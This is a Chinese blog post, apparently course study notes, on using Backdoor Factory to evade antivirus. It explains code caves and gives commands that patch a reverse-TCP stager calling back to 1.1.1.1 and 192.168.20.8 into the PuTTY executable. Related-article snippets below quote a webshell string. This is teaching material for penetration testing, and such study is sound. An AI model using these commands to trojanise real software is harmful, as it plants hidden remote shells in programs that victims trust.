免杀Backdoor-factory

最新推荐文章于 2024-04-27 10:02:08 发布
最新推荐文章于 2024-04-27 10:02:08 发布
阅读量447 收藏 1
点赞数
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/128011852
版权

Patch

● 通过替换EXE、DLL、注册表等方法修复系统漏洞或问题的方法
● BDF:向二进制文件中增加或者删除代码内容
○ 某些受保护的二进制程序无法patch
○ 存在一定概率文件会被patch坏掉

后门工厂

● 适用于windows PE x32/x64和Linux ELF x32/x64(OSX)
● 支持msf payload、自定义payload

● 将shellcode代码patch进模板文件,躲避AV检查
● Python语言编写

Msf使用patch方法

● 覆盖程序入口

msfvenom -p windows/shell/reverse_tcp ......

● 创建新的线程执行shellcode并跳回原程序入口

msfvenom -p windows/shell/reverse_tcp -k

● 增加代码片段跳转执行后跳回源程序入口

CTP方法

● 增加新的代码段section,与MSF的-k方法类似
● 使用现有的代码裂缝/洞(code save)存放shellcode

代码洞

● 二进制文件中超过两个字节的连续x00区域(代码片段间区域)
● 根据统计判断代码洞是编译器在进行编译时造成的,不同的编译器造成代码洞的大小不同
在这里插入图片描述

● 单个代码洞大小不足以存放完整的shellcode
○ 多代码洞跳转(非顺序执行)
■ 初期免杀率可达100%
○ 结合msf的stager方法
● Patch选项
○ 附加代码段
○ 单代码洞注入
○ 多代码洞注入

BDF基本使用

准备
首先我们先下载一个putty当作注入程序
在这里插入图片描述

● 检查二进制文件是否支持代码注入

backdoor-factory -f [软件路径] -S

● 显示可用的payload

backdoor-factory -f [软件路径] -S show
iat_reverse_tcp_stager_threaded

● 查看cave大小

backdoor-factory -f [软件路径] -c -l

免杀效果对比

backdoor-factory -f [软件路径] -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666
backdoor-factory -f [软件路径] -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666 -J
backdoor-factory -f [软件路径] -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -a -H 192.168.20.8 -P 6666

● 与veil-evasion集成
● Linux:backdoor-factory -f [软件路径] -s show
● IAT——import address table
○ 指针指向WinAPI地址,被称为thunks(形实转换程序),地址预定义

网络点点滴
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
backdoor-factory
05-25
The Backdoor Factory是一款安全测试工具,可以轻松的生成win32PE后门测试程序,ELF文件后门程序等。本工具仅用于安全实验和信息安全实验教学使用,禁止任何非法用途!
后门构建工具Backdoor Factory
weixin_33896069的博客
05-17 322
2019独角兽企业重金招聘Python工程师标准>>> ...
backdoor-factory详细使用教程
热门推荐
星落的博客
05-15 2万+
backdoor-factory简介 backdoor-factory是一款后门构建工具。与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。 backdoor-factory下载 kali预装的有坑,应该从github下载。 运行命令: git clone https://github.com/secretsquirrel/the-backdoor-factory.git backdoor-factory常用命令 -h 查看帮助...
the-backdoor-factory
iteye_16188的博客
11-27 727
参考:[url]https://github.com/secretsquirrel/the-backdoor-factory[/url] 貌似很有趣,值得深入了解了解 :wink: [b]安装过程[/b] [code="java"]1. easy_install wget "https://pypi.python.org/packages/source/e/ez_setup/ez_set...
Kali Linux渗透测试 137 后门工具--Backdoor-factory
kevinhanser
04-13 5903
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 patch通过替换 exe、dll、注册表等方法修复系统漏洞或问题的方法 bdf:向二进制文件中增加或者删除代码内容 某些受保护的二进制程序无法 patch 存在一定概率问价你会被 patch
工具介绍-the-backdoor-factory(第九课).docx
09-15
2. 进入 The Backdoor Factory 项目的目录,使用命令 `cd the-backdoor-factory`。 3. 使用 `./backdoor.py` 命令来生成Payload,并将其植入到可执行文件中。 4. 使用 `-f` 选项指定要植入的可执行文件,使用 `-S` ...
backdoor-apk:backdoor-apk是一个shell脚本,可简化向任何Android APK文件添加后门的过程。 此Shell脚本的用户应具有Linux,Bash,Metasploit,Apktool,Android SDK和smali等的工作知识。此Shell脚本按原样提供,不提供任何形式的保证,并且仅用于教育目的
02-01
"backdoor-apk" 是一个专门针对Android APK文件的shell脚本工具,它的主要功能是为APK文件植入后门。这意味着它可以让使用者在Android应用中加入秘密入口,允许未经授权的访问或控制。这个工具的使用目标群体是对...
Backdoor-CTF-Crypto-400.rar
09-30
"Backdoor-CTF-Crypto-400"可能是一个中级难度的题目,其难度级别为400,暗示着这可能是一个需要深入理解和应用密码学知识才能解决的问题。下面,我们将深入探讨可能涉及的密码学知识点。 1. **加密算法**:题目中...
Visual Backdoor-开源
07-04
【Visual Backdoor-开源】项目是一个专注于Windows应用程序开发的开源项目,主要利用Winsock组件来构建远程管理工具。Winsock,全称为Windows Socket,是Windows操作系统中的网络编程接口,它为开发者提供了标准的...
backdoor-factory工具使用
qq_46804551的博客
04-25 729
简介 backdoor-factory是一款后门构建工具。与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。 项目地址: https://github.com/secretsquirrel/the-backdoor-factory.git 使用 backdoor-factory常用命令 -h 查看帮助信息 -f 测试指定文件 -S 检查软件是否支持patch -s
kali linux之Backdoor-factory
weixin_30824479的博客
03-05 570
Backdoor-------python编写 适用于windows PE x32/x64 和Linux ELF x32/x64(OSX),支持msf payload 自定义payload 将shellcode代码patch进行模板文件,躲避AV检查 Patch: 通过替换exe,dll,注册表等方法修复系统漏洞或问题的方法 BDF:向二进制文件中增加或删除代码内容,某些受保护的二...
TideSec远控免杀学习四(BackDoor-Factory+Avet+TheFatRat)
fa1lr4in的小博客
02-12 3348
BackDoor-Factory 介绍 BackDoor-factory,又称后门工厂(BDF),BDF是也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具。但是作者已经于2017年停止更新,免杀效果就算现在来看也还算不错的。 原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来...
BackDoor
a1b2c3是弱口令
08-08 1658
题目: 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右键,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'...
远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71)
Ms08067安全实验室
03-09 743
本专题文章导航1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题(2)-msfvenom隐...
kali2021用backdoor-factory
weixin_41613326的博客
09-09 247
kali2021用backdoor-factory
BackdoorFactory:安全研究者的利器
最新发布
gitblog_00028的博客
04-27 392
BackdoorFactory:安全研究者的利器 backdoorfactoryA from-scratch rewrite of The Backdoor Factory - a MitM tool for inserting shellcode into all types of binaries on the wire.项目地址:https://gitcode.com/gh_mirrors...
Kali中backdoor factory不能识别EXE文件报“not a PE FILE”的解决方法
thefail的博客
10-30 1566
Kali默认安装的the-backdoor-factory不能正确识别WINPE文件,需要自行安装步骤如下 git clone https://github.com/secretsquirrel/the-backdoor-factory #下载T-B-F pip install capstone #安装Python依赖 然后就可以愉快的玩耍了 ...
使用 backdoor 工具注入ShellCode
CSDN
08-12 1万+
backdoor-factory 顾名思义,直接翻译过来就是后门工厂的意思。其利用打补丁的方式编码加密PE文件,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果,利用该工具,攻击者可以在不破坏原有可执行文件的功能的前提下,在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后,就可以触发恶意代码。Backdoor Factory不仅提供常用的脚本,还允许嵌入其他工具生成的Shellcode,如Metasploit。
2024最新最全【免杀技术】零基础入门到精通
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-25 1439
如果你也想学习:黑客&网络安全的SQL攻防攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18。
HERCULES免杀技术详解及实战
文章末尾给出了与免杀技术相关的其他专题链接,包括msfvenom、Evasion模块、Veil、Venom、Shellter、BackDoor-Factory、Avet和TheFatRat等,这些链接可以帮助读者进一步探索和学习免杀技术的多样性和复杂性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值